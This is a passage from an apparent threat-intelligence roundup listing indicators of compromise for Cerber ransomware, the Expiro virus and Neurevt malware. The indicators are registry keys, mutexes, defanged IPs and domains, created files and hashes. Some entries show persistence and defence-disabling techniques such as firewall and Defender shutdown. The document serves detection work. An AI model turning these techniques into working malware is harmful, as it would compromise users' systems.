5ba866dbb2ace005cfa32382404ac0927695f52bedce0804564549e633be8318 6478b2ce18a6a7671a39aa254ba0c4aaf123a0f5b27e9c86e323b663332f18f8 6f2add6401f59d813de66bc1152240f2e7622e293a0b10c5a804790b7068195b 6f9d45cf7571949de6db54d2e4c642ae63e30ba0eaf4f3075b8cd36749171377 919d3b68ee264053ae4f0f3d9caf93c055c421dabdc419d5d52d09d089142498 f7ce779ae0308c0c0da8280d3182506eda97778e91969eb4ea86dc3bfddb12df `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-RPO_aJyoeEU/XZdeH2iYLUI/AAAAAAAACuI/SCBwjGCIJyIMAR-wF6oeU4AIzvdRArjxwCLcBGAsYHQ/s1600/0aae22c6557c43cf199421eb6b367d23469909b5f860468c1e42b0e5730808d5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IIykQjPA0AM/XZdeLyj6vqI/AAAAAAAACuM/nVaobZBr2Ogna6OVzJQdW2pTI3IiybJZQCLcBGAsYHQ/s1600/0aae22c6557c43cf199421eb6b367d23469909b5f860468c1e42b0e5730808d5_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-gHb7-YxUIJc/XZdeQanDu9I/AAAAAAAACuQ/HMU0hlzxH4opqS3WS8lyDkCvCtTRNw2VwCLcBGAsYHQ/s1600/919d3b68ee264053ae4f0f3d9caf93c055c421dabdc419d5d52d09d089142498_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Cerber-7192026-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: Run ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\COMMAND PROCESSOR \nValue Name: AutoRun ` | 25 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Magnify ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Magnify ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wusa ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: wusa ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: LocationNotifications ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: FlashPlayerApp ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: FlashPlayerApp ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: DWWIN ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: DWWIN ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mshta ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: mshta ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoconv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: autoconv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: RMActivate_isv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: RMActivate_isv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: w32tm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: w32tm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: netbtugc ` | 1 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 25 \n`shell.{785F99DE-E95E-3921-EE78-D7777849AA01}` | 1 \n`shell.{967822DD-7042-E624-BEA7-C7EF520E90F5}` | 1 \n`shell.{A92873EC-3840-982A-DA5D-DDDC12AA8495}` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`31[.]184[.]234[.]0/25` | 25 \n`216[.]239[.]34[.]21` | 8 \n`216[.]239[.]32[.]21` | 7 \n`216[.]239[.]36[.]21` | 5 \n`216[.]239[.]38[.]21` | 5 \n`54[.]88[.]175[.]149` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}` | 25 \n`%TEMP%\\# DECRYPT MY FILES #.html` | 3 \n`%TEMP%\\# DECRYPT MY FILES #.txt` | 3 \n`%TEMP%\\# DECRYPT MY FILES #.url` | 3 \n`%TEMP%\\# DECRYPT MY FILES #.vbs` | 3 \n`%HOMEPATH%\\# DECRYPT MY FILES #.html` | 2 \n`%HOMEPATH%\\# DECRYPT MY FILES #.txt` | 2 \n`%HOMEPATH%\\# DECRYPT MY FILES #.url` | 2 \n`%HOMEPATH%\\# DECRYPT MY FILES #.vbs` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Magnify.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Magnify.exe` | 2 \n`%System32%\\Tasks\\Magnify` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wusa.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\wusa.exe` | 2 \n`%System32%\\Tasks\\wusa` | 2 \n`%System32%\\Tasks\\mtstocom` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\odbcconf.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\odbcconf.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\netbtugc.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\netbtugc.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\expand.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\expand.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\AdapterTroubleshooter.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\AdapterTroubleshooter.exe` | 1 \n`%System32%\\Tasks\\autoconv` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 151143935c4283f66a837eca1761400ab0573929e04217a5be0286b28eeb9d15 1736c692db984e5ceb7e15a127f2478400a78c30785fd3c195ae4d9468b80259 185f85a2fbc3e27f87b099ff50a1f03f89e724e7927ec9edac4c4416dc87c109 1da732e9670f73e980723ea167abb29c5b553603c3804ec4bb9a03a4d506e8a4 3a6ca5a46ac5ac3ef7972b22e2fa5cdc4af2e137150691ed1b7a15b1ce9030a4 3c7e1a50d31138b53165e98d7bc2ba570304359bb4f7baab7ded17cc3fb3bc4c 4574e5aeda39aadfadb399654d2a6db00884be85b0882fb0acc4dbf14153ca0e 4e242ff308fc31ada637861fed73373c30eb2d5ecfda92760498fcbe30a9bb07 503baff89f763142c5b49a527972c7119be3f95fcc8cc2a1cde8bb71fd76cd02 561caadf62f59ee8dfd6d9c97e5692875458c55b3e2d53ba43e9496c40ee0824 5dbfa76bd1edb0ae7a516a08c760e2234506d64ae7c905f8e0e8830d74ef8613 65afc018d8cdcc9ec4756e98000265e3ecc3e394b7e5d493dfd6d106cc15118a 6971a5b1aa7e57abad2939f4be1a92651ea7ac12251b804ae17f2ecb1e1bf200 70b5c51e692dcd2f432c05170f7f823fdfd5b6857267117a92fe9d358a7026ed 84a45eec021015ee2eeb5acb7251f3c50c626b41bf47b8fce7c822253e175c64 999a1e5659ac864771ad420c7cad50de5b5118adb5abb80ffe18ad28c932f5a0 a51de392aae3ade74991dd86b1d205c2cc5ecb0752cac2a02c95d61ff14a558c a80ace30082b76edb75d6c9a4f9165af721a8f8b13ac0862bc438589e0af01bd a8fe11512ba3e48b178ad9ef994f48ec581394e69cbdb808f15c1432a762c636 b1e46c28ddff91c0d586933b500ce29bcf83fc094864c4227b6e70fa1981f064 b7cf83e8596736ced202a1de5e67fbaa5bdf9074697d548fdd83800802732ec4 b8c85a34ed5ccfe058c8ba65606add1efdcfe694d0f32e6b91e4b977da1392a8 bd68985801dd6b820c3a0c21883aa4ace809b2a62cbba278ac3a4d53166bcf85 cc1efac0bf7786ea4bbd4963d78aee4498e034dd778adce6977eca3d78666483 d3080983742d3deacdbc53a43b1482cfe1573ec8d957fba0f456a676dca3bd90 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Kmwm7kXL8Ns/XZdfJq4vreI/AAAAAAAACuk/WOVujTC03JM3dM-kQHru22Tj4kR4RC9RQCLcBGAsYHQ/s1600/bd68985801dd6b820c3a0c21883aa4ace809b2a62cbba278ac3a4d53166bcf85_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-MRt4ru8qx8w/XZdfO4C1MII/AAAAAAAACuo/zNE3AakVS3MgxWB5thlGv50WsYL-XH6fgCLcBGAsYHQ/s1600/bd68985801dd6b820c3a0c21883aa4ace809b2a62cbba278ac3a4d53166bcf85_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Virus.Expiro-7192043-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Start ` | 8 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusOverride ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallDisableNotify ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallOverride ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UacDisableNotify ` | 5 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DoNotAllowExceptions ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION \nValue Name: jfghdug_ooetvtgk ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: JudCsgdy ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 5 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_64 \nValue Name: Type ` | 3 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_64 \nValue Name: Start ` | 3 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Start ` | 1 \nMutexes | Occurrences \n---|--- \n`SetupLauncher` | 12 \n`Global\\<random guid>` | 11 \n`gazavat-svc` | 8 \n`kkq-vx_mtx<number, matching [0-9]{1,2}>` | 8 \n`{7930D12C-1D38-EB63-89CF-4C8161B79ED4}` | 5 \n`{79345B6A-421F-2958-EA08-07396ADB9E27}` | 5 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]10[.]110` | 5 \n`87[.]106[.]190[.]153` | 4 \n`18[.]213[.]250[.]117` | 2 \n`91[.]195[.]240[.]126` | 2 \n`208[.]100[.]26[.]251` | 1 \n`18[.]215[.]128[.]143` | 1 \n`46[.]165[.]220[.]145` | 1 \n`46[.]165[.]254[.]198` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`atw82ye63ymdp[.]com` | 3 \n`xxsmtenwak[.]com` | 3 \n`grbjgfprk[.]com` | 3 \n`ydchosmhwljjrq[.]com` | 3 \n`ygqqaluei[.]com` | 3 \n`wwyreaohjbdyrajxif[.]com` | 3 \n`bekvfkxfh[.]com` | 3 \n`caosusubld[.]com` | 3 \n`warylmiwgo[.]com` | 3 \n`xomeommdilsq[.]com` | 3 \n`mdofetubarhorbvauf[.]com` | 3 \n`gfaronvw[.]com` | 1 \n`wstujheiancyv[.]com` | 1 \n`kbivgyaakcntdet[.]com` | 1 \n`dvwtcefqgfnixlrdb[.]com` | 1 \n`yrkbpnnlxrxrbpett[.]com` | 1 \n`oawvuycoy[.]com` | 1 \n`citnngljfbhbqtlqlrn[.]com` | 1 \n`bungetragecomedy9238[.]com` | 1 \n`oeuwldhkrnvxg[.]com` | 1 \n`kbodfwsbgfmoneuoj[.]com` | 1 \n`wdgqvaya[.]com` | 1 \n`ypwosgnjytynbqin[.]com` | 1 \n`jlaabpmergjoflssyg[.]com` | 1 \n`ausprcogpngdpkaf[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe` | 8 \n`%System32%\\alg.exe` | 8 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\ngen_service.log` | 8 \n`%SystemRoot%\\SysWOW64\\svchost.exe` | 8 \n`%System32%\\<random, matching '[a-z]{8}'>.tmp` | 8 \n`%SystemRoot%\\microsoft.net\\framework\\v2.0.50727\\<random, matching '[a-z]{8}'>.tmp` | 8 \n`%LOCALAPPDATA%\\bolpidti\\judcsgdy.exe` | 5 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\judcsgdy.exe` | 5 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\ngen_service.lock` | 5 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\ngenservicelock.dat` | 5 \n`%LOCALAPPDATA%\\bolpidti` | 4 \n`%SystemRoot%\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorsvw.exe` | 3 \n`%SystemRoot%\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen_service.log` | 3 \n`\\TEMP\\ShMnr23` | 3 \n`%SystemRoot%\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe` | 1 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe` | 1 \n`%SystemRoot%\\SysWOW64\\cjnnhbik.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\hmdklpnd.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\ghnjiafh.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\nojnfemc.tmp` | 1 \n`\\TEMP\\emf` | 1 \n`\\TEMP\\J3OHIb3` | 1 \n`%SystemRoot%\\SysWOW64\\ggaiaabg.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\elmmpkjb.tmp` | 1 \n`%SystemRoot%\\microsoft.net\\framework64\\v2.0.50727\\jjicllfe.tmp` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 08c199483a9569dbe74565c65ab0dfe038338ffe0c37061316a3a45116a9adb0 0b75593bf5cec1a4e6beecce8927ba895307c03d22387611fb6ced7805c2fa7b 293263135eb196a8027f6aea0f74038d60b848103f09db6d39e55b763d6bf26a 29ec1dfc85cfed46ccf8a53ca2e9f207cb126f6cec92a3b829ae61590bea1b1c 32ed07783188242c60837a208a6ebab9e37fa69fb69da9b28629c3e3971ccfa6 36e5bd8e4a5c7758dd28acda1ad479bfbfb268ca1c5339b4e9953daea48392ac 63530b594d1605211d405951823a3f5ac249660aa0ca542cb00247652dc3b544 664bd013762c59a6f0b0c8fbd7dbed06f971d2dfbc2921e10faf8b5e8aba2e8a c075f037fea0578197e56a520708152779a9332195b96a52bac64ff10a914d82 d28f2744b436cb2816ee6a63a44e2cfd4f952483b65c026ea8b4f384cc6b7e5e ea5a419cb19fc22c11d3751f0560f049631571b99c33d37482ddbca1ee4e3d6f f2fffb85b3e49c138128ef141b69a49fd09e3c7362ed8beed43dc6c46deadbcb f5fec4cf85c3e2c936455b0f0ec8a6cbbb138dfa5e31db4920037f9baf46ab65 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-guqbKk1KALI/XZdfmFc0OdI/AAAAAAAACuw/UIRzGpyFmhI9AVkph1Cak6NgjZCt6FQzQCLcBGAsYHQ/s1600/0b75593bf5cec1a4e6beecce8927ba895307c03d22387611fb6ced7805c2fa7b_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/--8eH6AJyv7o/XZdfqIKWukI/AAAAAAAACu0/Hp0eBDhQBFEcNMzAW2SyTgwtyVNez_9MwCLcBGAsYHQ/s1600/0b75593bf5cec1a4e6beecce8927ba895307c03d22387611fb6ced7805c2fa7b_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-nbuUH19K8pI/XZdfvUc-nEI/AAAAAAAACu4/kaNc2n968KcIf10r_b-23kAiLkcpYN1jACLcBGAsYHQ/s1600/c075f037fea0578197e56a520708152779a9332195b96a52bac64ff10a914d82_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Neurevt-7192122-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\WIN7ZIP \nValue Name: Uuid ` | 26 \n`<HKCU>\\SOFTWARE\\WIN7ZIP ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 \nValue Name: CheckSetting ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 \nValue Name: CheckSetting ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 \nValue Name: CheckSetting ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\PUBLICPROFILE \nValue Name: EnableFirewall ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SSDPSRV \nValue Name: Start ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RSTRUI.EXE ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RSTRUI.EXE \nValue Name: Debugger ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: random ` | 2 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\10DF0332\\CG1 \nValue Name: GLA ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\OMYLCQKSW.EXE \nValue Name: Debugger ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\6EDA084A\\CS1 ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\6EDA084A\\CW1 ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\6EDA084A\\CW1 \nValue Name: 1916 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Javaupdate ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\6EDA084A\\CG1 \nValue Name: GLA ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\BZSBKOTIU.EXE \nValue Name: Debugger ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\5BDD0726 ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\5BDD0726\\CS1 ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\5BDD0726\\CW1 ` | 1 \n`<HKCR>\\CLSID\\{7C59DF73-6FE7-724E-963F-58E2D8DE89F2}\\5BDD0726\\CG1 ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 9 \n`52[.]185[.]71[.]28` | 5 \n`208[.]100[.]26[.]251` | 1 \n`40[.]76[.]4[.]15` | 1 \n`20[.]41[.]46[.]145` | 1 \n`40[.]67[.]189[.]14` | 1 \n`94[.]130[.]148[.]39` | 1 \n`176[.]56[.]236[.]180` | 1 \n`143[.]215[.]215[.]205` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`update-silo[.]com` | 1 \n`frizzcams[.]com` | 1 \n`fapncam[.]com` | 1 \n`theafam[.]info` | 1 \n`pl1[.]co[.]vu` | 1 \n`kasn5[.]name` | 1 \n`up-windows[.]in` | 1 \n`myssfii[.]eu` | 1 \n`emicrosoft[.]eu` | 1 \n`allegro[.]ga` | 1 \n`frky7[.]name` | 1 \n`marklou1[.]eu` | 1 \n`s1allegro[.]net` | 1 \n`b[.]dqwjnewkwefewaaaaa3[.]com` | 1 \n`fe298c697c247af42926ae65f504cbab[.]380d71f68b776c687229362c8017cfd4[.]sink1[.]doombringer[.]pw` | 1 \n`b[.]2uandmearevideos2k2[.]com` | 1 \n`e4afed3b6057875d3cab2c8acadf19b0[.]9079efdb6bd50d249cecbf60d0cf8a59[.]sink1[.]doombringer[.]pw` | 1 \n`b[.]12thegamejuststarted10k12[.]com` | 1 \n`9f1338aaa955b14adce82b28456563dd[.]8e38e1a12b675dd8ad0879ac9df9dd43[.]sink1[.]doombringer[.]pw` | 1 \n`0a3871225132117b6a5a3ca80e3637e7[.]bd822b74f0f09fe15387a4e573dfd4b8[.]sink1[.]doombringer[.]pw` | 1 \n`5fa5dd9e6db7852950c1d75652840205[.]d30bfb82739133ccfd1a869f816afd1e[.]sink1[.]doombringer[.]pw` | 1 \n`a289b7027c3a8ccd97e35492ec62c4a7[.]79c70407c7e6ecfca660191065cb2e91[.]sink1[.]doombringer[.]pw` | 1 \n`82ffe6077d09c53372a2f4177b3a00fd[.]2418805ba4dbdf2b323c3ee2d28fd899[.]sink1[.]doombringer[.]pw` | 1 \n`b[.]6worldwipemek6[.]com` | 1 \n`ce5ccbd7434dc4f3e00d5d615c8f1cfe[.]f919bc55f255fc49078e2b0e54e60b5e[.]sink1[.]doombringer[.]pw` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\My Documents\\My Videos\\Desktop.ini` | 18 \n`%System32%\\Tasks\\Windows Update Check - 0x00000000` | 17 \n`%ProgramData%\\riaiccape` | 3 \n`%ProgramData%\\riaiccape\\desktop.ini` | 3 \n`%ProgramData%\\ubvhynpxh` | 2 \n`%ProgramData%\\ubvhynpxh\\desktop.ini` | 2 \n`%ProgramData%\\hemxccape` | 2 \n`%ProgramData%\\hemxccape\\desktop.ini` | 2 \n`%ProgramData%\\randomfolder\\desktop.ini` | 2 \n`%ProgramData%\\rpeulaaql\\desktop.ini` | 1 \n`%ProgramData%\\odoaztybt\\desktop.ini` | 1 \n`%ProgramData%\\mwvaztybt\\desktop.ini` | 1 \n`%ProgramData%\\safpdndnn\\desktop.ini` | 1 \n`%ProgramData%\\Javaupdate\\desktop.ini` | 1 \n`%System32%\\Tasks\\Windows Update Check - 0x6EDA084A` | 1 \n`%ProgramData%\\dtdasndku\\desktop.ini` | 1 \n`%ProgramData%\\Winrar_Update\\desktop.ini` | 1 \n`%System32%\\Tasks\\Windows Update Check - 0x6E3308B1` | 1 \n`%ProgramData%\\omylcqksw\\desktop.ini` | 1 \n`%System32%\\Tasks\\Windows Update Check - 0x5FF907D6` | 1 \n`%ProgramData%\\svchost\\desktop.ini` | 1 \n`%System32%\\Tasks\\Windows Update Check - 0x19CF045A` | 1 \n`%System32%\\Tasks\\Windows Update Check - 